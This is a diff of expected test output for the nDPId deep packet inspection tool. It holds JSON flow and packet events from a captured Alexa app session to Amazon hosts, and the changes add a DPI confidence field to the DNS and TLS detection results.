-00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1490976195980,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.62.115"}}
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1490976195980,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.62.115"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195983,"flow_last_seen":1490976195983,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976195983,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1490976195983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976195983,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8wa5AAEAGL16sECrYNFQ+c6O4AbsdU0twAAAAAKAC\/\/9kRAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195984,"flow_last_seen":1490976195984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976195984,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -917,27 +917,27 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1490976196001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976196001,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7jUvy2sHVNLcaAScSD3DwAAAgQFtAQCCAps+oycAPaK3gEDAwg="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1490976196002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976196002,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0CnRAAEAG5qCsECrYNFQ+c6O5Abv6a4CuA2RlJoAQAVcj2AAAAQEICgD2iuBs+oX0"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1490976196003,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976196003,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0wa9AAEAGL2WsECrYNFQ+c6O4AbsdU0tx1L8trYAQAVeVpAAAAQEICgD2iuBs+oyc"}
-00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1490976196008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976196008,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7r33SsOWDm7RKAScSApGwAAAgQFtAQCCAps+o9VAPaK3gEDAwg="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1490976196009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976196009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MZ5AAEAGv3asECrYNFQ+c6O6AbtYObtE990rD4AQAVfHrwAAAQEICgD2iuBs+o9V"}
-00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196016,"flow_last_seen":1490976196016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976196016,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1490976196016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976196016,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8LWlAAEAG4smsECrYNu8csuLAAbtkEKeIAAAAAKAC\/\/+hiQAAAgQFtAQCCAoA9orhAAAAAAEDAwg="}
-00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}}
-00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}}
-00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}}
+00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}}
+00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}}
+00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2910,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1490976196075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976196075,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIa5AAOcGR5A27xyyrBAq2AG74sBbwNFvZBCniXASH\/4cPAAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2911,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1490976196075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976196075,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoLWpAAEAG4tysECrYNu8csuLAAbtkEKeJW8DRcFAQAVdmrQAA"}
